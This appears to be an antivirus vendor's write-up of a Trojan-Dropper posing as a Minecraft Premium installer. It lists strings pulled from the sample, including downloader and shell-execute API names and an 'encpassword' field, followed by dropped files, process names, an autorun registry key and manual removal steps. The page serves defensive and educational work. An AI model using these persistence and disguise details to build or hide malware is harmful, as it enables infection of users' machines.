Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0
Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/5.0 (Windows NT 6.0; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19
co.uk
POST / HTTP/1.
HEAD / HTTP/1.
/ HTTP/1.
Content-Type: application/x-www-form-urlencoded
Microsoft\WinNT.tmp
calc.exe
127.0.0.1
encpassword
C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
wsock32.dll
shfolder.dll
shell32.dll
ShellExecuteA
urlmon.dll
URLDownloadToFileA
MPHTTP
KWindows
MPUDP


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3308
    Fuck.exe:2740
    Adobe.exe:1464
    Adobe.exe:4032
    Adobe.exe:2220
    Minecraft PremiumV2.4.exe:308
    RoamingJava.exe:2944

  2. Delete the original Trojan-Dropper file.
  3. Delete or disinfect the following files created/modified by the Trojan-Dropper:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Minecraft PremiumV2.4.exe (50 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\dnserrordiagoff_webOC[1] (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\RoamingJava.exe (148 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe (72 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp (36 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MINECRAFT PREMIUMV2.EXE (50 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Fuck.exe (72 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "Adobe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now